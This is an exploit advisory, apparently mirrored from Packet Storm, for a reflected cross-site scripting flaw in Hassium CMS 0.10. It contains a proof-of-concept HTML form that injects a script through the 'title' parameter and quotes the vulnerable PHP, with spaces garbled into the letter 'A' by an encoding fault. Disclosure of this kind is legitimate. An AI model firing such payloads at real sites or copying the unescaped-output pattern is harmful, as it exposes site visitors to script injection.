Hassium CMS 0.10 Cross Site Scripting

🗓️ 16 Jan 2017 00:00:00Reported by M.R.S.L.YType

packetstorm🔗 packetstormsecurity.com👁 45 Views

Hassium CMS 0.10 Cross Site Scripting by Ashiyane Digital Security Tea

`*=============================================================|  
|A ExploitA Title:A A HassiumA CMSA CrossA SiteA Scripting  
|  
|A ExploitA Author:A AshiyaneA DigitalA SecurityA Team  
|  
|A VendorA Homepage:A http://www.hassium.org/index.php  
|  
|A DownloadA LinkA :A https://github.com/hassiumsoft/hasscms-app/archive/master.zip  
|  
|A VersionA :A VA 0.10  
|  
|A PlatformA :A PHP  
|  
|A TestedA on:A A KaliA LinuxA   
|  
|A Date:A 1A /14A /A 2017  
*=============================================================|  
|A ExploitA Code:A   
|A   
|<HTML>  
|<HEAD>  
|A A A A <TITLE>HassiumA CMSA CrossA SiteA Scripting</TITLE>  
|</HEAD>  
|<BODY>  
|<formA action="http://Localhost/hasscms-app-master/themes/candidate/media/jackbox/modules/jackbox_social.php"A method="get">  
|A <inputA type="hidden"A name="title"A value=""/><script>alert('M.R.S.L.Y')</script>">  
|</form>  
|</BODY>  
|</HTML>  
|  
*=======================|  
|A vulnerabilityA MethodA :A GET  
*=======================|  
|VulnerableA code:  
|  
|A A A <?php  
|A A A A A A A A   
|A A A A A A A A ifA (isset($_GET["title"]))A {  
|A A A A A A A A A A A A   
|A A A A A A A A A A A A $titleA =A $_GET["title"];  
|A A A A A A A A A A A A printA str_replace("{contentTitle}",A $title,A '<metaA itemprop="name"A content="{contentTitle}"A />');  
|A A A A A A A A }  
|A A A A A A A A   
|A A A A A A A A ifA (isset($_GET["poster"]))A {  
|A A A A A A A A A A A A   
|A A A A A A A A A A A A $posterA =A $_GET["poster"];  
|A A A A A A A A A A A A printA str_replace("{imgPoster}",A $poster,A '<metaA itemprop="image"A content="{imgPoster}"A />');  
|A A A A A A A A }  
|A A A A A A A A   
|A A A A A A A A ?>  
*=============================================================|  
|A SpecialA ThanksA ToA :A VirangarA ,A EhsanA Cod3rA OA micleA OA Und3rgr0undA OA Amir.ghtA O  
|A xenotixOA modiretOA VA ForA VendettaA OA AlirezaA OA r4oufA OA SpooferA O  
|A AndA AllA OfA MyA FriendsA OA TheA LastA OneA :A MyA Self,A M.R.S.L.YA A   
*=============================================================|  
`

16 Jan 2017 00:00Current